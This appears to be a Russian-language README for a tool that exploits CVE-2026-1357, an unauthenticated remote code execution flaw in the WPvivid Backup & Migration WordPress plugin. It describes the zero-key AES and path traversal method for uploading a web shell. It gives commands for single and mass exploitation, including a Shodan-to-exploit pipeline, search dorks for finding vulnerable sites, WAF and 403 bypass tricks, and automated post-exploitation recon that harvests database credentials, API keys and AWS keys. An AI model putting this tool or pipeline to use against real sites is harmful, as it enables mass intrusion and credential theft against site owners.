
Автоматизированный инструмент эксплуатации для CVE-2026-1357 — неаутентифицированного RCE в WPvivid Backup & Migration. Сканирует цели WordPress, обходит WAF/403, загружает шелл через path traversal и выполняет пост-эксплуатационную разведку с генерацией отчёта.
Автор CVE: Lucas Montes (NiRoX)
Инструмент: CyberTechAjju
CVSS: 9.8 (Critical) | Затронуто: ≤ 0.9.123 | Исправлено: 0.9.124
Только для авторизованного тестирования безопасности. Несанкционированный доступ к системам незаконен.
Неаутентифицированная RCE в WPvivid Backup & Migration через две связанные уязвимости:
openssl_private_decrypt() возвращает false при неверном ключе → phpseclib v1 обрабатывает его как AES-ключ из нулевых байтов → атакующий шифрует 16 нулевыми байтамиname → ../uploads/shell.php выходит за пределы каталога резервных копийОграничение: Эксплуатация возможна только когда wpvivid_api_token сгенерирован и не истёк.
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt
# Только сканирование (определение WordPress + WPvivid + версии)
python3 cve_2026_1357.py -u http://target.com
# Сканирование + эксплуатация + автоматическая постэксплуатация
python3 cve_2026_1357.py -u http://target.com --exploit
# Эксплуатация без постэксплуатационной разведки
python3 cve_2026_1357.py -u http://target.com --exploit --no-post
# Массовое сканирование с отчётом
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
# Через прокси Burp
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080
# Режим только полезной нагрузки
python3 cve_2026_1357.py -u http://x --payload-only
-u, --url URL одиночной цели
-l, --list Файл со списком URL (по одному в строке)
--exploit Включить режим эксплуатации
--shell NAME Имя файла шелла (по умолчанию: pwn_remote.php)
--no-post Пропустить постэксплуатационную разведку
--report Сгенерировать markdown PoC-отчёт
--report-dir DIR Каталог для отчётов
-t, --threads N Параллельные потоки (по умолчанию: 5)
--timeout SECS Таймаут запроса (по умолчанию: 10)
--proxy URL HTTP-прокси для Burp
--payload-only Вывести base64-полезную нагрузку и выйти
Полный список см. в dorks.md. Быстрые примеры:
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"
# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"
# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
| awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
CVE-2026-1357-poc/
├── cve_2026_1357.py ← Основной инструмент (сканер + эксплойт + постэксплуатация)
├── dorks.md ← Dorks для Shodan/Google/Censys/FOFA/ZoomEye
├── requirements.txt ← Зависимости Python
├── .gitignore
└── README.md ← Этот файл
Lucas Montes (NiRoX) — обнаружение CVE
CyberTechAjju — инструмент эксплуатации
| Функция | Описание |
|---|
| 🔍 Автоопределение | WordPress + плагин WPvivid + определение версии |
| 🛡️ Обход WAF | Ротация User-Agent, подмена заголовков, трюки с кодированием |
| 🔓 Обход 403 | X-Forwarded-For, X-Original-URL, нормализация путей, двойное кодирование |
| 💀 Автоэксплуатация | AES-полезная нагрузка с нулевым ключом + загрузка через path traversal |
| 📋 Постэксплуатация | Автоматический запуск 20+ команд разведки (id, whoami, passwd, wp-config, SUID и т.д.) |
| 🔑 Извлечение данных | Поиск учётных данных БД, API-ключей, паролей, AWS-ключей в выводе |
| 📊 Генерация отчётов | Markdown PoC-отчёт с полными доказательствами эксплуатации |
| ⚡ Массовое сканирование | Многопоточность с поддержкой прокси/Burp |